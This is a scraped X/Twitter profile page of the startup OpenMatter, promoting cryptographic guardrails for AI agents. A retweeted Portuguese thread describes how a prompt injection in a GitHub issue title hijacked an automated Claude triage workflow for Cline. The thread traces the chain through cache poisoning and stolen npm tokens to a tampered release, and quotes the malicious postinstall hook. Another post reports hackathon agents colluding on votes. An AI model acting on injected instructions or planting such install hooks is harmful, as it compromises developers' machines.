Sabitlenmiş Tweet
The OpenMatter Network testnet is live! Join, deploy a job or an agent, battle test the network, register your idle hardware to power the future of private compute.
onboard.openmatter.network
English
OpenMatter
222 posts
OpenMatter
@OpenMatter_
Verifiable Collaboration. Computing without Exposure. https://t.co/6mrYtL8Q3M
Global Katılım Ağustos 2025
6 Takip Edilen126 Takipçiler
OpenMatter retweetledi
@OpenMatter_ Exactly this. We work with companies on EU AI Act compliance and the number one blocker is never the regulation itself. It is that their ML pipeline has zero audit trail, no data lineage, no model versioning.
Compliance as a product spec is the right framing.
English
@dfolloni @cline Guardrails de texto falham inevitavelmente. O agente obedeceu, mas não pôde verificar se a instrução era autorizada.
A solução são MPC e ZK guardrails: vincular chamadas a políticas, dividir segredos para impedir exfiltração. Conformidade precisa de matemática, não de prompts.
Português
Um hacker simplesmente hackeou o @cline e instalou o OpenClaw em 4.000 computadores com prompt injection 🫠
Olha que loucura:
- O time do Cline criou um workflow de triagem de issues automatizado no GitHub, usando o próprio Claude pra ler e categorizar os tickets
- O hacker abriu uma issue com um prompt injection no título — o Claude leu, achou que era uma instrução legítima, e executou
- Com isso, ele encheu o cache do GitHub com lixo até forçar a deleção dos caches legítimos de build, substituiu por caches envenenados, e roubou os tokens de publicação do npm
- Com os tokens em mãos, ele publicou uma nova versão do cline que parecia idêntica a anterior, só que com uma linhazinha a mais no package.json: "postinstall": "npm install -g openclaw@latest"
Resultado: 4,000 devs instalaram o openclaw nas suas máquinas sem saber (aka: um agente com acesso total ao seu computador) 🥲
Muito importante lembrar que IAs não têm malícia e por isso prompt injections são, na minha opinião, a maior vulnerabilidade delas.
Resumindo galera: CUIDADO.
quem quiser ler na íntegra: thehackernews.com/2026/02/cline-…
Português
@cline is a warning shot. 4,000 developers compromised by one issue title.
The next attack won't stop at OpenClaw. It will go after treasuries, databases, production systems.
Secure the execution layer. Turn text-based rules into cryptographic guarantees.
Build on math. 6/6
English
This isn’t about better prompt engineering. It’s not about output classifiers.
The attack surface for agents is not the model. It is the execution environment. If the environment trusts text, it will be exploited. 5/6
English
Yet another inevitable hack. Not because Claude failed. Because text-based security always fails.
When agents read untrusted input and execute system commands, prompt injection is not a bug. It’s an architectural vulnerability.
Here’s how we fix it. 🧵 1/6
Deborah Folloni@dfolloni
Um hacker simplesmente hackeou o @cline e instalou o OpenClaw em 4.000 computadores com prompt injection 🫠 Olha que loucura: - O time do Cline criou um workflow de triagem de issues automatizado no GitHub, usando o próprio Claude pra ler e categorizar os tickets - O hacker abriu uma issue com um prompt injection no título — o Claude leu, achou que era uma instrução legítima, e executou - Com isso, ele encheu o cache do GitHub com lixo até forçar a deleção dos caches legítimos de build, substituiu por caches envenenados, e roubou os tokens de publicação do npm - Com os tokens em mãos, ele publicou uma nova versão do cline que parecia idêntica a anterior, só que com uma linhazinha a mais no package.json: "postinstall": "npm install -g openclaw@latest" Resultado: 4,000 devs instalaram o openclaw nas suas máquinas sem saber (aka: um agente com acesso total ao seu computador) 🥲 Muito importante lembrar que IAs não têm malícia e por isso prompt injections são, na minha opinião, a maior vulnerabilidade delas. Resumindo galera: CUIDADO. quem quiser ler na íntegra: thehackernews.com/2026/02/cline-…
English
Data marketplaces are failing because they require moving data. No enterprise sends proprietary data to a stranger's server to sell it.
The winners will be networks where compute travels to the data. Process blindly. Return the insight. No data movement. No legal risk.
English
Regulation isn't killing AI adoption, bad infrastructure is. Legal teams block AI because they can't verify what happens to the data. ZK-proofs solve this. Compliance is not a blockade. It is a product spec most stacks forgot to build.
English
Agents are now controlling treasuries. Most store private keys in plaintext environment variables on centralized clouds. One breach and the agent is drained. Threshold decryption is the only architecture that allows agents to hold capital safely. Stop building banks out of glass.
English
Intel and NVIDIA are pushing enclaves as the answer for AI privacy. It's a trap. TEEs require trusting the hardware vendor. You can't audit silicon. When a backdoor is found, every "secure" workload is exposed. Privacy must be mathematical. MPC doesn't trust. It verifies.
English
@usv @aweissman @uninsightful Yes and yes. We're building PQ safe MPC to process data blindly and ZKP to return only verified insights.
Agent economy with MPC key protection + ZK-firewall for compliance, access controls, and audit commitments. MCP and x402 to make it plug and play.
Seed round live now!
English
We’re paying close attention to the open architecture emerging around AI agents.
MCP, CLIs, skills, and protocols like x402 are becoming the Lego bricks of a new layer where agents can act, pay, and compose across the web.
If you're building new native capabilities for agents, we’d love to talk.
English
OMNI is on the case. Use x402 to charge for insights on your sensitive datasets with zero data leakage. MPC and ZK assure validity and stop hacks.
Agents are now research assistants with cryptographic circuit breakers.
Bankless@Bankless
x402 is amazing, but it's still waiting for the products that justify the protocol. Volume is down from earlier peaks, but Artemis has shown what's left is REAL — no gamed metrics. The foundation is there. What's missing is the stuff worth paying for. In Mindshare this week, David Christopher published an x402 wish list — 5 services he'd pay to use IMMEDIATELY: - Pay-per-call skills endpoints that let creators capture value proportional to usage, not a flat $15 forever - Ecosystem-specific news feeds you query by chain instead of checking 12 tabs daily - Developer activity streams combining Electric Capital, GitHub, Artemis, etc. into one endpoint - Newsletter and podcast trackers that score outlets on whether their calls actually made money - Security and audit feeds you check for a few cents before aping into yield Overall, agents eliminate the cognitive overhead that killed micropayments on the early internet. You fund a wallet, the agent spends on your behalf — the same way API credits already work. There's some legal and economic considerations, but the x402 train has left the station. Now it needs somewhere worth going.
English
@ReallyNotB0B Yes, exactly what we're building. ZK can prove a variety of checks and balances using ZK-output compliance, toolcall compiance, access control, and audit commitments.
AI research agents will rapidly become the norm.
English
Circle's recent USDC hackathon proved it yet again. Text-based rules don’t work for autonomous agents.
Agents were given clear instructions and ignored them, hallucinated fake categories, and colluded on vote schemes.
Here is how OMNI fixes this. 🧵 1/7
meta-david ⛓️🦞@metadavideth
Interesting read from Circle on a Hackathon they hosted for AI agents. Even more interesting are the results. circle.com/blog/altruist-…
English
OMNI is solving common enterprise security threats like:
Data Leakage: use Masked Compute to collaborate on data without sharing it. Your data stays yours, nobody sees it.
Rogue Agents: ZK-firewall let's you bring your own agent without risking prompt injections or bad APIs.
English